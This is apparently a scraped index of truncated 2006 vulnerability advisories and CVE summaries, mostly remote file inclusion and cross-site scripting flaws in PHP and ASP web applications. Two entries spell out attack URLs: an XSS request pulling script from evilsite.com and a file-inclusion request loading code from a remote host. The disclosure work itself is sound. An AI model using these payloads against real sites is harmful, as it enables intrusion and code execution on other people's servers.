CVE-2006-3159

pipemaster in Sun ONE/iPlanet Messaging Server 5.2 HotFix 1.16 built May 14 2003 allows local users to read portions of restricted files via a symlink attack on msg.conf in a directory identified by the CONFIGROOT environment variable, which returns the first line of the file in an error message...

BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities

No description provided by source. --------------------------------------------------------------------------- Grayscale BandSite CMS =rootpath Remote File Include Vulnerabilities --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Te...

FreeBSD : WebCalendar -- information disclosure vulnerability (09c92f3a-fd49-11da-995c-605724cdf281)

Secunia reports : socsam has discovered a vulnerability in WebCalendar, which can be exploited by malicious people to bypass certain security restrictions and disclose sensitive information. Input passed to the 'includedir' parameter isn't properly verified, before it is used in an 'fopen' call...

CMS Faethon 1.3.2 - mainpath Remote File Inclusion

CMS Faethon 1.3.2 - mainpath Remote File Inclusion \ /\ \ / | \ \ | / \ // / | \ | \ \ Y / | \ / / \ /| /\ / / / / / .OR.ID ECHOADV33$2006 --------------------------------------------------------------------------- ECHOADV33$2006 CMS Faethon 1.3.2 mainpath Remote File Inclusion...

DCP-Portal 6.1.x (root) Remote File Include Vulnerability

No description provided by source. ----------------------------------------------------- Advisory id: FSA:013 Author: Federico Fazzi Date: 12/06/2006, 9:31 Sinthesis: DCP-Portal 6.1.x, Remote command execution Type: high Product: http://www.dcp-portal.org/ Patch: unavailable...

DCP-Portal 6.1.x - 'root' Remote File Inclusion

----------------------------------------------------- Advisory id: FSA:013 Author: Federico Fazzi Date: 12/06/2006, 9:31 Sinthesis: DCP-Portal 6.1.x, Remote command execution Type: high Product: http://www.dcp-portal.org/ Patch: unavailable ----------------------------------------------------- 1...

DoceboLms303.txt

----------------------------------------------------- Advisory id: FSA:010 Author: Federico Fazzi Date: 09/06/2006, 7:24 Sinthesis: Docebo Lms 3.0.3, Remote command execution Type: high Product: http://www.docebolms.org/ Patch: unavailable ----------------------------------------------------- 1...

DCP-Portal 6.1.x (root) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ========================================================= DCP-Portal 6.1.x root Remote File Include Vulnerability ========================================================= ----------------------------------------------------- Advisory id:...

f_ac-1.11.txt

----------------------------------------------------- Advisory id: FSA:011 Author: Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: AWF CMS 1.11, Remote command execution Type: high Product: http://www.awf-cms.org/ Patch: unavailable ----------------------------------------------------- 1...

cms-bandits2.5.txt

----------------------------------------------------- Advisory id: FSA:006 Author: Federico Fazzi Date: 08/06/2006, 11:09 Sinthesis: cms-bandits 2.5, Remote command execution Type: high Product: http://sourceforge.net/projects/cms-bandits Patch: unavailable...

Chemical Directory - XSS

Chemical Directory v.unknown doesnt say on website Homepage: http://www.scriptsez.net/ Effected files: dictionary.php XSS Vulnerability via keyword variable: http://www.example.com/dictionary.php?action=browse&keyword=eSCRIPT SRC=http://evilsite.com/xss.js/SCRIPT...

Cross site scripting

Cross-site scripting XSS vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable...

CVE-2006-2833

Cross-site scripting XSS vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable...

CVE-2006-2833

Cross-site scripting XSS vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable...

CVE-2006-2828

CVE-2006-2828 is a vulnerability in PHP-Nuke where a global variable overwrite allows remote PHP file inclusion by a modified phpbb_root_path parameter to multiple admin scripts (index.php, admin_ug_auth.php, admin_board.php, admin_disallow.php, admin_forumauth.php, admin_groups.php, admin_ranks....

ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit

----------------------------------------------------------------------------- - ASP Discussion Forum Like the one on FreeVBCode.com Remote XSS Exploit - -= http://colander.altervista.org/advisory/ASPDisc.txt =- ----------------------------------------------------------------------------- -= ASP...

Squirrelmail local file inclusion

Squirrelmail local file inclusion bug in functions/plugin.php . Tested on the latest 1.4.x version. No authentication needed. if isset$plugins && isarray$plugins foreach $plugins as $name useplugin$name; ... function useplugin $name if fileexistsSMPATH . "plugins/$name/setup.php" includeonceSMPAT...

phpMyDesktop.txt

phpMyDesktop|arcade 1.0 FINAL Code Execution Exploit found-by: darkgod [email protected] links: criticalsecurity.NET, hackthissite.org, hacbloc.org video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar phpMyDesktop|arcade is a php-based 'bridge' between a game and message board. Its g...

OaBoard 1.0 Remote File inclusion

OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...

phpMyDesktop|arcade 1.0 FINAL Code Execution

phpMyDesktop|arcade 1.0 FINAL Code Execution Exploit found-by: darkgod [email protected] links: criticalsecurity.NET, hackthissite.org, hacbloc.org video-@: http://dgod.dajoob.com/videos/phpmydesktoparcade.rar phpMyDesktop|arcade is a php-based 'bridge' between a game and message board. Its g...